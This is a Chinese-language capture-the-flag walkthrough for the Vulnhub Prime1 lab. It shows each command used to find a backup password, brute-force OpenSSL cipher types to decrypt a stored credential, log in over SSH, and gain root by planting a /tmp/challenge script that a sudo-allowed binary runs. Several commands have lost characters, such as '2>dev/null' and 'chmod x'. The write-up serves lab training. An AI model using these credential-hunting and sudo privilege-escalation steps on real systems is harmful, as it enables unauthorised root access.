摘要
Vulnhub靶机实操笔记-Prime1-解法二
涉及知识内容:OpenSSL攻击,OD进制转换,OpenSSL加密方式识别,sudo内网提权
Prime1提权的另一种方式
接上一篇章,获得一个初始权限通过uname -a查看当前系统版本较低是存在一个内核提权的漏洞的。正常情况下,直接使用内核提权速度更快也比较暴力容易被检测发现。
一、查看用户权限
可以看到有用户saket不需要密码就能以root权限执行,当执行enc时候可以root权限执行却不要输入密码
移动到/home/saket目录下,首先先查看当前目录下有哪些文件与权限。发现enc是有执行权限的,直接尝试执行需要输入密码。尝试strings能否直接查看enc内容查看不了,尝试file读取enc提示没有读的权限。
代码语言:javascript复制 cd /home/saket
ls -liah
./enc
strings enc #尝试查看enc的内容
file enc #尝试直接读取enc
二、翻找文件
既然提示要输入密码,接下来的思路就是找敏感文件,看看能不能在关键信息。
代码语言:javascript复制 find / -name '*backup*' 2>dev/null | sort | less
find #查找文件命令
2>dev/null #将报错文件丢除
sort #将结果排序
less #分页
在opt/backup文件夹尝试查看server_database,提示server_database是目录。进入server_database目录下找到backup_pass文件,通过读取文件提示enc的密码是backup_password
三、输入密码
再次执行enc文件,将获得的密码输入进去,提示权限不足enc.txt和key.txt无法释放。我丢,一开始我还是完了www-data权限不够,后面大佬点拨没有sudo去执行,加入sudo后终于成功。
不过出现good为何会如此怪异?txt那两个文件呢?发现执行后在当前目录进行释放了两个txt文件,查看enc.txt文件看到一个base64加密内容,查看key.txt文件提示将ippsec转成md5的hash
编码加密
将ippsec不输出结尾的换行符进行md5加密,以空格为分割,打印输出第一个值
代码语言:javascript复制 sudo echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}'
-n #不输出结尾的换行符
md5sum #md5的加密形式
awk #awk是文本处理工具
-F #以什么条件进行分割条件,本例子是用空格进行分割
四、OpenSSL
1、openssl解法命令格式
利用获得的key.txt提示将ippsec”转换为md5哈希,利用key去解密看看enc.txt的内容具体是什么。(echo -n有时候需要根据解密的具体内容增减)
代码语言:javascript复制 echo -n '需要解密的内容' | openssl enc -d -a -CipherType -K '16进制的key值'
-n #不输出结尾的换行符
-d #解密
-a #指定编码
查看openssl帮助看到标准命令就是enc,加密类型就是框框内的
将这些加密类型整合到一个文件中(这边保存的文件名是CipherTypeRaw),并对文件进行重新排列每行
将CipherTypeRaw文件中的空格全部替换成n换行
sudo awk '{gsub(/ /,"n"); print}' CipherTypeRaw
gsub #替换\中间的内容
CipherTypeRaw #操作的文件名名称替换后的效果如下
对数据再美化美化,将数据排序一下,并且取值唯一,稍微统计一下一共有多少行
代码语言:javascript复制 sudo awk '{gsub(/ /,"n"); print}' CipherTypeRaw | sort | uniq | wc -l
sudo awk '{gsub(/ /,"n"); print}' CipherTypeRaw | sort | uniq >CipherTypes
gsub #替换\中间的内容
CipherTypeRaw #操作的文件名名称
sort #结果排序
uniq #结果取唯一值
wc -l #统计结果
>CipherTypes #是将结果输出到文件CipherTypes上
sudo openssl enc --help #详细查看enc下面的使用方法
-K #看到带这个key是需要16进制的hex,并不是传入前面生成的md5值
2、OD
od是linux的系统命令,转储文件8进制或其他进制
代码语言:javascript复制 man od
-A参数
-A #指定RADIX为在doxn四种中的一种,例子选择的是none
-t #指定类型,例子需要指定x1
选择十六进制的,(靶机选择的是x1)
代码语言:javascript复制 单字节转16进制:使用ASCII码表将每个字符转换为对应的16进制值。例如,字符串 "A" 的16进制表示为 "41",其中 "41" 是字符 "A" 在ASCII码表中的十六进制表示。
双字节转16进制:使用Unicode字符编码标准将每个字符转换为对应的16进制值。例如,字符串 "中" 的16进制表示为 "4E2D",其中 "4E2D" 是字符 "中" 在Unicode编码表中的十六进制表示。
对于判断是使用双字节还是单字节转16进制,您需要查看当前编码方式,主要有以下三种:
ASCII编码:该编码方式只支持单字节字符,因此在此编码方式下,将字符串转换为16进制时只需要使用单字节转换方式即可。例如 "ippsec" 就是单字节。
UTF-8编码:UTF-8编码是一种可变长度字符编码方式,支持单字节和双字节字符。在此编码方式下,单字节字符采用单字节转换方式,而双字节字符采用双字节转换方式。例如 "中文" 就是双字节字符。
UTF-16编码:UTF-16编码是一种双字节编码方式,因此在此编码方式下,所有字符都是双字节字符,需要使用双字节转换方式。例如 "英文" 在UTF-16编码方式下也是双字节字符。
根据上述规则,如果字符串 "ippsec" 是使用ASCII编码的,则将其转换为16进制时只需要使用单字节转换方式;如果是使用UTF-8编码,那么需要对其中的双字节字符使用双字节转换方式。
3、生成十六进制hex
将字符串 "ippsec" 转换为 MD5 哈希值,并将其输出为十六进制格式。
代码语言:javascript复制 sudo echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | tr -d 'n' | od -A n -t x1 | tr -d 'n' | tr -d ' '
-n #不输出结尾的换行符
md5sum #md5的加密形式
awk #awk是文本处理工具
-F #以什么条件进行分割条件,本例子是用空格进行分割
tr #可以对来自标准输入的字符进行替换、压缩和删除。
-d #删除字符串
4、开始破解openssl
当不知道是何种加密类型时,采用bat脚本批量跑命令去破解,并将正确的加密方式输出
例子的加密方式是:aes-256-ecb,通过解密获得一个密码
代码语言:javascript复制 for Cipher in $(cat CipherTypes);do echo 'nzE iKr82Kh8BOQg0k/LViTZJup 9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb bF[91/498]
yvF6lD/wfpY2ZnA1787ajtm /aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null ;echo $Cipher;done
for Cipher in $(cat CipherTypes);do echo -n 'xxxxxxxxxxxx' | openssl enc -d -a -$Cipher -K xxxxxxxxxxxxx 2>/dev/null ; echo $Cipher;done
写了bat脚本遍历CipherTypes文件中的参数,将参数传给变量Cipher
-n #openssl的bug,有的时候需要,有的时候不需要。具体取决于解密的xxxxx内容
中是否有包含n换行符。如果有换行符时候需要保留-n,里面内容没有时就把不需要
-n
do #后接具体执行操作语句命令
2>dev/null #将报错信息丢除
done #结束bat脚本命令
再次验证一下获得的加密方式,这边直接用aes-256-ecb进行解密操作
代码语言:javascript复制echo 'nzE iKr82Kh8BOQg0k/LViTZJup 9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm /aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -aes-256-ecb -K '3336366137346362336339353964653137643631646233303539316333396431'
五、拿下内网机器
根据解密的内容翻译,得到用户saket有一个旧密码是 tribut_to_ippsec
尝试ssh直接连接,发现成功连接机器
六、内网提权
1、查看系统详情
代码语言:javascript复制uname -a
2、查看用户权限
发现可以不需要密码以root权限去执行一个/home/victor/undefeated_victor文件
代码语言:javascript复制sudo -l
3、查看定时任务
代码语言:javascript复制cat etc/crontab
4、成功提权
提示/tmp/challenge文件没有找到
代码语言:javascript复制sudo /home/victor/undefeated_victor
来到/tmp目录下查看是否有challenge文件,发现没有challenge文件。于是新建一个challenge文件,在文件中写启用一个新的bash线程命令。对文件challenge赋予执行权限,再利用前面提醒的“不需要密码以root权限去执行一个/home/victor/undefeated_victor文件”再执行文件,就获得了root权限。
代码语言:javascript复制 cd /tmp
echo '#!/bin/bash' >challenge
echo '/bin/bash' >>challenge
chmod x challenge
sudo /home/victor/undefeated_victor
whoami
七、靶场下载链接
https://download.vulnhub.com/prime/Prime_Series_Level-1.rar
